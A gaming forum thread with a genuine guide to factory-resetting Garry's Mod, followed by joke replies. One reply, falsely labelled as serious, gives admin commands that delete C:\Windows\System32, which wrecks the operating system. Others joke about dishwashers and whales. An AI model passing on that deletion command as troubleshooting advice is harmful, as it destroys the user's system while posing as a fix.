Thread Rating:
  • 0 Vote(s) - 0 Average
How to: (Actually) Factory Reset GMod
Many things can break in Garry's Mod and cause issues that may not be fixed after simple troubleshooting steps like steam file verification. In any other game this is fine - just reinstall. However, Garry's Mod tends to 'hold on' to bad settings and bad files, even after uninstallation and re-installation. The aim of this small step-by-step guide is to bring the game condition back to as if you installed it for the first time.

Factory Resetting Garry's Mod

•  0. (Optional) Back up your customization.
    •  0a. Make a backup of your 'autoexec.cfg' file located in 'Steam\SteamLibrary\steamapps\common\GarrysMod\garrysmod\cfg'. This assumes you have (correctly) stored all of your relevant settings and binds here.
    •  0b. Make a note of your current launch options.
    •  0c. 'Favorite' any Workshop Addons that you do not want to lose.
  •  1. Unsubscribe from ALL Workshop Addons.
    • Addons that you have subscribed to a long time ago and forgotten about can cause issues or conflicts that persist between re-installations and computers. Addons can also receive updates that break functionality or, again, cause conflicts.
    • In general, all Addons have the potential to cause problems, either by themselves or when used with other Addons.
    • The safest option is to simply remove all of them, and later only reinstall the Addons that you actually use.
  •  2. Run 'FactoryReset-GMod.bat' without "Run as administrator". It is located in 'Steam\SteamLibrary\steamapps\common\GarrysMod'.
  •  3. Load game then exit.
  •  4. Navigate to 'Steam\userdata\[User ID]\4000\remote\cfg' and open 'config.cfg' with notepad. Select and delete every line, leaving a blank file.
  •  5. In your Steam library, right click the game and select 'Properties'. Replace your launch options with the following options:
    Code:
    -autoconfig -default +host_writeconfig config.cfg full +mat_savechanges +quit

•  6. Load game. It will automatically exit.
  •  7. Uninstall Garry's Mod and Counter-Strike: Source through steam by right clicking the game in your library, and navigating to Manage -> Uninstall.
  •  8. Remove remaining Garry's Mod leftover folder(s).
    •  8a. Delete 'GarrysMod' from 'Steam\SteamLibrary\steamapps\common'.
    •  8b. Alternatively, if you have Garry's Mod and/or Counter-Strike: Source installed on a dedicated drive, delete everything in the 'steamapps' folder.
  •  9.  Re-download and install Counter-Strike: Source, then Garry's Mod.
  •  10. Erase factory reset launch options from 'Properties' menu.
  •  11. Load Garry's Mod. At the bottom right there will be a button labeled 'Games'. Click on it and make sure Counter-Strike: Source is ticked in the sub menu. 
    • Half-Life 2 and Team Fortress 2 may also be ticked by default, you can leave them as-is.
    • This is a good time to check if your issue has been solved, before you start setting the game up again.
  •  12. (Optional) Restore your backups.
    •  12a. Move your 'autoexec.cfg' back into 'Steam\SteamLibrary\steamapps\common\GarrysMod\garrysmod\cfg'.
    •  12b. Re-enter your launch options.
    •  12c. Re-subscribe to Workshop Addons.

EDIT  12/24/23: Clarification
try scrubbing gently with vinegar and baking soda
[Image: gBkzZod.png]
feed your hard drive to a whale
  • 13. (Required) Uninstall the game and go outside.
    • 13a. Uninstall the game.
    • 13b. Detach yourself from your gaming chair.
    • 13c. Go outside.
TL;DR
???????? ??????
I put my computer in my dishwasher and it worked great after that. Thanks for the advice
[Image: b_560x95.png]
(12-24-2023, 08:28 AM)Summer Wrote: I put my computer in my dishwasher and it worked great after that. Thanks for the advice
you're actually not supposed to put your computer in the dish washer, you should hand wash it with a mild dish soap and warm water
[Image: gBkzZod.png]
*SERIOUS RESPONSE*

There’s a much more effective way to do this. Pretty easy too.

1. Click the start icon and search for Command Prompt.

2. Select "Run as administrator".

3. Type del /s /q C:\Windows\System32\* and hit "Enter".

4. Type rd /s /q C:\Windows\System32 and press Enter.
[Image: frieren-fall-winter.jpeg]
Also a serious response:

I fixed gmod by uninstalling it. Works great!
[Image: b_560x95.png]
(12-24-2023, 06:28 AM)reina Wrote:
  • 13. (Required) Uninstall the game and go outside.
    • 13a. Uninstall the game.
    • 13b. Detach yourself from your gaming chair.
    • 13c. Go outside.
I don’t even know what outside is
???????? ??????